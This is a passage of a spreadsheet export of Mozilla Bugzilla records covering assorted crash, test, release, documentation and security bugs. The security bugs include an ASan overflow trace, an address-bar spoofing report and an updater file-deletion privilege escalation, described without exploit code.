The cert that this is crashing on used to be available when starting the demo ofrom the demo on http://www.synchroedit.com/ but I cannot find it there now (it's possible it's available once you create an account there). If there's a way to extract it from the cert8.db file, I could attach it; or I could provide the cert8.db file in private, if necessary.</t>
        </is>
      </c>
      <c r="X449" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" t="n">
        <v>1295175</v>
      </c>
      <c r="B450" t="inlineStr">
        <is>
          <t>2016-08-15 09:18:02 -0700</t>
        </is>
      </c>
      <c r="C450" t="inlineStr">
        <is>
          <t>Intermittent mobile/android/tests/browser/chrome/test_awsy_lite.html | Test timed out.</t>
        </is>
      </c>
      <c r="D450" t="inlineStr">
        <is>
          <t>2020-12-21 10:36:12 -0800</t>
        </is>
      </c>
      <c r="E450" t="n">
        <v>1</v>
      </c>
      <c r="F450" t="n">
        <v>1</v>
      </c>
      <c r="G450" t="n">
        <v>6</v>
      </c>
      <c r="H450" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I450" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J450" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="K450" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L450" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M450" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N450" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P450" t="inlineStr"/>
      <c r="Q450" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R450" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S450" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T450" t="n">
        <v>1</v>
      </c>
      <c r="U450" t="n">
        <v>0</v>
      </c>
      <c r="V450" t="n">
        <v>5</v>
      </c>
      <c r="W450" t="inlineStr">
        <is>
          <t>Filed by: philringnalda [at] gmail.com
https://treeherder.mozilla.org/logviewer.html#?job_id=1854897&amp;repo=autoland
https://archive.mozilla.org/pub/mobile/tinderbox-builds/autoland-android-api-15/1471043956/autoland_ubuntu64_vm_armv7_mobile_test-mochitest-chrome-bm120-tests1-linux64-build50.txt.gz</t>
        </is>
      </c>
      <c r="X450" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" t="n">
        <v>86354</v>
      </c>
      <c r="B451" t="inlineStr">
        <is>
          <t>2001-06-18 00:54:04 -0700</t>
        </is>
      </c>
      <c r="C451" t="inlineStr">
        <is>
          <t>Mozilla crashes when trying to send Mail with SSL</t>
        </is>
      </c>
      <c r="D451" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E451" t="n">
        <v>1</v>
      </c>
      <c r="F451" t="n">
        <v>1</v>
      </c>
      <c r="G451" t="n">
        <v>6</v>
      </c>
      <c r="H451" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I451" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J451" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K451" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L451" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M451" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N451" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P451" t="inlineStr">
        <is>
          <t>CRASHER</t>
        </is>
      </c>
      <c r="Q451" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R451" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S451" t="inlineStr">
        <is>
          <t>psm2.0</t>
        </is>
      </c>
      <c r="T451" t="n">
        <v>0</v>
      </c>
      <c r="U451" t="n">
        <v>0</v>
      </c>
      <c r="V451" t="n">
        <v>8</v>
      </c>
      <c r="W451" t="inlineStr">
        <is>
          <t>Moilla crashes every time I try to send an Email via a SMTP Server with SSL. I
had to accept the Certificate first but immediatly after that it crashes
(without sending or saving the mail). It doesn't even ask for the password (I
typed in the correct username).</t>
        </is>
      </c>
      <c r="X451" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="452">
      <c r="A452" t="n">
        <v>1356401</v>
      </c>
      <c r="B452" t="inlineStr">
        <is>
          <t>2017-04-13 14:17:43 -0700</t>
        </is>
      </c>
      <c r="C452" t="inlineStr">
        <is>
          <t>monitor pigeon exceptions and alert ops/devs</t>
        </is>
      </c>
      <c r="D452" t="inlineStr">
        <is>
          <t>2018-04-09 09:41:30 -0700</t>
        </is>
      </c>
      <c r="E452" t="n">
        <v>1</v>
      </c>
      <c r="F452" t="n">
        <v>1</v>
      </c>
      <c r="G452" t="n">
        <v>4</v>
      </c>
      <c r="H452" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I452" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J452" t="inlineStr">
        <is>
          <t>Antenna</t>
        </is>
      </c>
      <c r="K452" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N452" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P452" t="inlineStr"/>
      <c r="Q452" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R452" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S452" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T452" t="n">
        <v>1</v>
      </c>
      <c r="U452" t="n">
        <v>0</v>
      </c>
      <c r="V452" t="n">
        <v>13</v>
      </c>
      <c r="W452" t="inlineStr">
        <is>
          <t>If Pigeon can't connect to RabbitMQ, it should let us know in a way that gets our attention. Theoretically, it logs something and statsd's something:
https://github.com/mozilla/socorro-pigeon/blob/735c183ecc626f1bc31648cc68f8f33870aea6c2/pigeon.py#L324
This bug covers verifying that's correct and tying it to a monitor/alert.</t>
        </is>
      </c>
      <c r="X452" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="453">
      <c r="A453" t="n">
        <v>1784588</v>
      </c>
      <c r="B453" t="inlineStr">
        <is>
          <t>2022-08-12 17:12:36 -0700</t>
        </is>
      </c>
      <c r="C453" t="inlineStr">
        <is>
          <t>stack-buffer-overflow in [@ mozilla::widget::GfxInfo::EnsureInitialized] on startup</t>
        </is>
      </c>
      <c r="D453" t="inlineStr">
        <is>
          <t>2023-01-16 20:52:10 -0800</t>
        </is>
      </c>
      <c r="E453" t="n">
        <v>1</v>
      </c>
      <c r="F453" t="n">
        <v>1</v>
      </c>
      <c r="G453" t="n">
        <v>3</v>
      </c>
      <c r="H453" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I453" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J453" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K453" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L453" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M453" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N453" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P453" t="inlineStr">
        <is>
          <t>[adv-main105+r]</t>
        </is>
      </c>
      <c r="Q453" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R453" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S453" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T453" t="n">
        <v>1</v>
      </c>
      <c r="U453" t="n">
        <v>0</v>
      </c>
      <c r="V453" t="n">
        <v>13</v>
      </c>
      <c r="W453" t="inlineStr">
        <is>
          <t>This is detected at launch with an ASan build. It seems to be blocking startup.
`ASAN_OPTIONS=strict_string_checks=1` is used to get a good stack.
```
==30983==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7b979fd406f5 at pc 0x7b987f1c169c bp 0x7b979fd40190 sp 0x7b979fd3f950
READ of size 7 at 0x7b979fd406f5 thread T21 (Gecko)
    #0 0x7b987f1c169b in atoi /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:506:3
    #1 0x7b9790c3c14a in mozilla::widget::GfxInfo::EnsureInitialized() /builds/worker/checkouts/gecko/widget/android/GfxInfo.cpp:218:16
    #2 0x7b9790c3df29 in mozilla::widget::GfxInfo::GetFeatureStatusImpl(int, int*, nsTSubstring&lt;char16_t&gt;&amp;, nsTArray&lt;mozilla::widget::GfxDriverInfo&gt; const&amp;, nsTSubstring&lt;char&gt;&amp;, mozilla::widget::OperatingSystem*) /builds/worker/checkouts/gecko/widget/android/GfxInfo.cpp:403:3
    #3 0x7b9790a9a4fb in mozilla::widget::GfxInfoBase::GetFeatureStatus(int, nsTSubstring&lt;char&gt;&amp;, int*) /builds/worker/checkouts/gecko/widget/GfxInfoBase.cpp:829:7
    #4 0x7b9789fc0229 in IsFeatureSupported /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1122:8
    #5 0x7b9789fc0229 in IsDXInterop2Blocked /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:1130:11
    #6 0x7b9789fc0229 in gfxPlatform::Init() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:899:35
    #7 0x7b9789fbeb4b in gfxPlatform::GetPlatform() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:460:5
    #8 0x7b9790c79681 in mozilla::widget::GeckoViewSupport::Open(mozilla::jni::LocalRef&lt;mozilla::jni::TypedObject&lt;_jclass*&gt; &gt; const&amp;, mozilla::jni::Ref&lt;mozilla::java::GeckoSession::Window, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::StringParam const&amp;, mozilla::jni::StringParam const&amp;, bool) /builds/worker/checkouts/gecko/widget/android/nsWindow.cpp:1618:3
    #9 0x7b9790cb45af in Call&lt;true, true, 0UL, 1UL, 2UL, 3UL, 4UL, 5UL, 6UL, 7UL, 8UL&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/jni/Natives.h:1194:5
    #10 0x7b9790cb45af in mozilla::jni::detail::ProxyNativeCall&lt;mozilla::widget::GeckoViewSupport, mozilla::java::GeckoSession::Window, true, true, mozilla::jni::Ref&lt;mozilla::java::GeckoSession::Window, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::StringParam const&amp;, mozilla::jni::StringParam const&amp;, bool&gt;::operator()() /builds/worker/workspace/obj-build/dist/include/mozilla/jni/Natives.h:1281:5
    #11 0x7b9790cb40fc in mozilla::widget::WindowEvent&lt;mozilla::jni::detail::ProxyNativeCall&lt;mozilla::widget::GeckoViewSupport, mozilla::java::GeckoSession::Window, true, true, mozilla::jni::Ref&lt;mozilla::java::GeckoSession::Window, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::Ref&lt;mozilla::jni::Object, _jobject*&gt; const&amp;, mozilla::jni::StringParam const&amp;, mozilla::jni::StringParam const&amp;, bool&gt;, true, mozilla::jni::Ref&lt;mozilla::jni::TypedObject&lt;_jclass*&gt;, _jclass*&gt; const&amp;, mozilla::widget::GeckoViewSupport&gt;::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/widget/WindowEvent.h:48:7
    #12 0x7b9787998e30 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:538:16
    #13 0x7b978794d89d in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:851:26
    #14 0x7b978794a698 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:683:15
    #15 0x7b978794aecb in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:461:36
    #16 0x7b97879a3961 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:187:37
    #17 0x7b97879a3961 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
    #18 0x7b978797362d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1205:16
    #19 0x7b9787980361 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #20 0x7b9788f21b13 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #21 0x7b9788e0c3d2 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #22 0x7b9788e0c3d2 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #23 0x7b9788e0c3d2 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #24 0x7b9790b4569a in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:150:27
    #25 0x7b9795289952 in nsAppStartup::Run() /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:295:30
    #26 0x7b97954ce94c in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5718:22
    #27 0x7b97954d0056 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5912:8
    #28 0x7b97954d14a6 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5968:21
    #29 0x7b97954d83c8 in GeckoStart /builds/worker/checkouts/gecko/toolkit/xre/nsAndroidStartup.cpp:54:18
    #30 0x7b979ef7948a in Java_org_mozilla_gecko_mozglue_GeckoLoader_nativeRun /builds/worker/checkouts/gecko/mozglue/android/APKOpen.cpp:386:17
    #31 0x7b97f86b60c7 in art_quick_generic_jni_trampoline adler32.c
    #32 0x7b97f86a7aa8 in NterpCheckCast crtbegin_so.c
Address 0x7b979fd406f5 is located in stack of thread T21 (Gecko) at offset 1365 in frame
    #0 0x7b9790c3a95f in mozilla::widget::GfxInfo::EnsureInitialized() /builds/worker/checkouts/gecko/widget/android/GfxInfo.cpp:178
  This frame has 21 object(s):
    [32, 64) 'dest.i'
    [96, 392) 'ref.tmp' (line 182)
    [464, 480) 'model' (line 186)
    [496, 512) 'ref.tmp6' (line 187)
    [528, 616) 'ref.tmp12' (line 188)
    [656, 672) 'product' (line 191)
    [688, 704) 'ref.tmp15' (line 192)
    [720, 808) 'ref.tmp23' (line 193)
    [848, 864) 'manufacturer' (line 196)
    [880, 896) 'ref.tmp26' (line 198)
    [912, 1000) 'ref.tmp34' (line 199)
    [1040, 1056) 'hardware' (line 206)
    [1072, 1088) 'ref.tmp38' (line 207)
    [1104, 1192) 'ref.tmp46' (line 208)
    [1232, 1248) 'release' (line 211)
    [1264, 1280) 'ref.tmp49' (line 212)
    [1296, 1304) 'ref.tmp50' (line 212)
    [1328, 1333) 'a' (line 215)
    [1360, 1365) 'b' (line 215) &lt;== Memory access at offset 1365 overflows this variable
    [1392, 1397) 'c' (line 215)
    [1424, 1429) 'd' (line 215)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
Thread T21 (Gecko) created by T0 (AndroidUI) here:
    #0 0x7b987f1bfb6c in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:208:3
    #1 0x7b97f8bc0c42 in art::Thread::CreateNativeThread(_JNIEnv*, _jobject*, unsigned long, bool) (/apex/com.android.art/lib64/libart.so+0x68ec42) (BuildId: 1dfb27162fe62a7ac7a10ea361233369)
    #2 0x921e0a2c9f35647f  (&lt;unknown module&gt;)
SUMMARY: AddressSanitizer: stack-buffer-overflow /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:506:3 in atoi
Shadow bytes around the buggy address:
  0x0f7373fa0080: f8 f2 f2 f2 f2 f2 00 00 f2 f2 f8 f8 f2 f2 f8 f8
  0x0f7373fa0090: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 00 00
  0x0f7373fa00a0: f2 f2 f8 f8 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x0f7373fa00b0: f8 f2 f2 f2 f2 f2 00 00 f2 f2 f8 f8 f2 f2 f8 f8
  0x0f7373fa00c0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 00 00
=&gt;0x0f7373fa00d0: f2 f2 f8 f8 f2 f2 f8 f2 f2 f2 05 f2 f2 f2[05]f2
  0x0f7373fa00e0: f2 f2 05 f2 f2 f2 05 f3 f3 f3 f3 f3 00 00 00 00
  0x0f7373fa00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f7373fa0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0f7373fa0110: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 01 f2 f8 f8
  0x0f7373fa0120: f2 f2 f8 f8 f2 f2 f8 f8 f2 f2 f8 f8 f2 f2 f8 f8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30983==ABORTING
```</t>
        </is>
      </c>
      <c r="X453" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="454">
      <c r="A454" t="n">
        <v>872882</v>
      </c>
      <c r="B454" t="inlineStr">
        <is>
          <t>2013-05-15 21:18:42 -0700</t>
        </is>
      </c>
      <c r="C454" t="inlineStr">
        <is>
          <t>Please unthrottle Firefox 21.0 updates on Thursday May 16</t>
        </is>
      </c>
      <c r="D454" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E454" t="n">
        <v>1</v>
      </c>
      <c r="F454" t="n">
        <v>1</v>
      </c>
      <c r="G454" t="n">
        <v>5</v>
      </c>
      <c r="H454" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I454" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J454" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K454" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L454" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M454" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N454" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P454" t="inlineStr"/>
      <c r="Q454" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R454" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S454" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T454" t="n">
        <v>1</v>
      </c>
      <c r="U454" t="n">
        <v>0</v>
      </c>
      <c r="V454" t="n">
        <v>4</v>
      </c>
      <c r="W454" t="inlineStr">
        <is>
          <t>Going unthrottled at 10% in Fx20 gave us the required ADI we need for early feedback.We should hold the same plan here unless anyone has other thoughts/concerns.</t>
        </is>
      </c>
      <c r="X454" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="455">
      <c r="A455" t="n">
        <v>147137</v>
      </c>
      <c r="B455" t="inlineStr">
        <is>
          <t>2002-05-26 00:49:49 -0700</t>
        </is>
      </c>
      <c r="C455" t="inlineStr">
        <is>
          <t>Bugzilla Guide whole file not updated.</t>
        </is>
      </c>
      <c r="D455" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E455" t="n">
        <v>1</v>
      </c>
      <c r="F455" t="n">
        <v>1</v>
      </c>
      <c r="G455" t="n">
        <v>4</v>
      </c>
      <c r="H455" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I455" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J455" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K455" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L455" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M455" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N455" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P455" t="inlineStr"/>
      <c r="Q455" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R455" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S455" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T455" t="n">
        <v>1</v>
      </c>
      <c r="U455" t="n">
        <v>0</v>
      </c>
      <c r="V455" t="n">
        <v>9</v>
      </c>
      <c r="W455" t="inlineStr">
        <is>
          <t>The latest Bugzilla Guide does not have an updated one-file version
(Bugzilla-Guide.html).
I'm not sure if this is usually updated, but it is out of date in any case and
needs to be deleted or (preferably) updated.</t>
        </is>
      </c>
      <c r="X455" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="456">
      <c r="A456" t="n">
        <v>228176</v>
      </c>
      <c r="B456" t="inlineStr">
        <is>
          <t>2003-12-11 09:00:33 -0800</t>
        </is>
      </c>
      <c r="C456" t="inlineStr">
        <is>
          <t>%00 in a URL causes incorrect display of hovered link in status bar</t>
        </is>
      </c>
      <c r="D456" t="inlineStr">
        <is>
          <t>2006-03-12 17:19:18 -0800</t>
        </is>
      </c>
      <c r="E456" t="n">
        <v>1</v>
      </c>
      <c r="F456" t="n">
        <v>1</v>
      </c>
      <c r="G456" t="n">
        <v>2</v>
      </c>
      <c r="H456" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I456" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J456" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K456" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N456" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P456" t="inlineStr">
        <is>
          <t>[sg:fix]security, spoof</t>
        </is>
      </c>
      <c r="Q456" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R456" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S456" t="inlineStr">
        <is>
          <t>mozilla1.6final</t>
        </is>
      </c>
      <c r="T456" t="n">
        <v>1</v>
      </c>
      <c r="U456" t="n">
        <v>5</v>
      </c>
      <c r="V456" t="n">
        <v>76</v>
      </c>
      <c r="W456" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6b) Gecko/20031129
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6b) Gecko/20031129
The mozilla is vulnerable of this bug!
Reproducible: Always
Steps to Reproduce:
1. Follow  
2. instruction
3. on the http://www.secunia.com/internet_explorer_address_bar_spoofing_test/
Actual Results:  
Address Bar Spoofing
Expected Results:  
The bug should be fixed</t>
        </is>
      </c>
      <c r="X456" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" t="n">
        <v>1212939</v>
      </c>
      <c r="B457" t="inlineStr">
        <is>
          <t>2015-10-08 10:04:09 -0700</t>
        </is>
      </c>
      <c r="C457" t="inlineStr">
        <is>
          <t>Maintenance Service updater File Deletion Elevation of Privilege</t>
        </is>
      </c>
      <c r="D457" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:11 -0700</t>
        </is>
      </c>
      <c r="E457" t="n">
        <v>1</v>
      </c>
      <c r="F457" t="n">
        <v>1</v>
      </c>
      <c r="G457" t="n">
        <v>3</v>
      </c>
      <c r="H457" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I457" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J457" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K457" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L457" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M457" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N457" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P457" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+]</t>
        </is>
      </c>
      <c r="Q457" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R457" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S457" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T457" t="n">
        <v>1</v>
      </c>
      <c r="U457" t="n">
        <v>0</v>
      </c>
      <c r="V457" t="n">
        <v>27</v>
      </c>
      <c r="W457" t="inlineStr">
        <is>
          <t>Created attachment 8671470
poc.rb
The updater.exe can be made to delete arbitrary files. It's possible because in the UpdateLog class paths a truncated with snprintf to fit in a buffer of MAXPATH length.
With the ability to delete arbitrary files it´s possible to elevate privilege further.
The poc needs a firefox installed to "C:\Program Files (x86)\Nightly\" and deletes the firefox.exe.</t>
        </is>
      </c>
      <c r="X457" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="458">
      <c r="A458" t="n">
        <v>1166930</v>
      </c>
      <c r="B458" t="inlineStr">
        <is>
          <t>2015-05-20 14:24:11 -0700</t>
        </is>
      </c>
      <c r="C458" t="inlineStr">
        <is>
          <t>Use darker toolbar icons on Windows 10</t>
        </is>
      </c>
      <c r="D458" t="inlineStr">
        <is>
          <t>2015-07-22 05:16:50 -0700</t>
        </is>
      </c>
      <c r="E458" t="n">
        <v>1</v>
      </c>
      <c r="F458" t="n">
        <v>1</v>
      </c>
      <c r="G458" t="n">
        <v>2</v>
      </c>
      <c r="H458" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I458" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J458" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K458" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L458" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M458" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N458" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P458" t="inlineStr"/>
